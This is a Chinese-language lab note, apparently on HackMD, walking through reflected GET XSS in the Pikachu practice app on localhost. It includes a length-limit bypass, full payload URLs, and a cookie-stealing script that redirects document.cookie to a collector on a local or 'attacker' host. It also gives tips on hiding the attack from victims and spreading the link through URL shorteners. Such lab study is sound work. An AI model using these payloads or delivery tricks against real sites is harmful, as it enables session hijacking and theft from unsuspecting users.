# 反射型xss(get) - 透過在URL參數注意惡意腳本代碼提交後,瀏覽器變會執行此代碼 - 方法一 - 進入到頁面嘗試在對話框輸入 ``<script>alert("xss")</script>`` - 問題 - 無法輸入全部,輸入長度被限制  - 修改大小 - 右鍵Inspect  - 再輸入一次後,觸發漏洞  - 方法二 - 直接將payload放到URL裡面 - 在message那裡 - ``` http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>alert("xss")</script>&submit=submit ```  - get會使URL就直接有payload - 例如: 在框框輸入``<script>alert("xss")</script>`` - URL : http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&submit=submit - message會經過編碼 - plaintext : http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>alert("xss")</%2Fscript>&submit=submit - 得到cookie - payload - 在框框裡輸入payload``<script> document.location = 'http://127.0.0.1/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>`` - <script>document.location = 'http://攻擊者/pikachu/pkxss/ xcookie/cookie.php?cookie=' + document.cookie;</script> - 網頁會重定向到 http://127.0.0.1/pikachu-master/index.php - 訪問偽造的站點後後, 自動重定向 為首頁, 是為了不讓用戶察覺被攻擊的事實, 如果重定向其他地址, 用戶就可能會知道被攻擊了 - 在 xss 後台可以看到 cooikes 被記錄  - GET型漏洞將帶有XSS的URL發送給目標即可 - 常見手法 : 縮網址 - 舉例: - 將在xss後台得到cookies的referer做縮網址並傳送給目標,可以再獲得cookies  - 原因 - 源代碼 - /opt/lampp/htdocs/pikachu-master/pkxss/xcookie 裡的 post.html 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up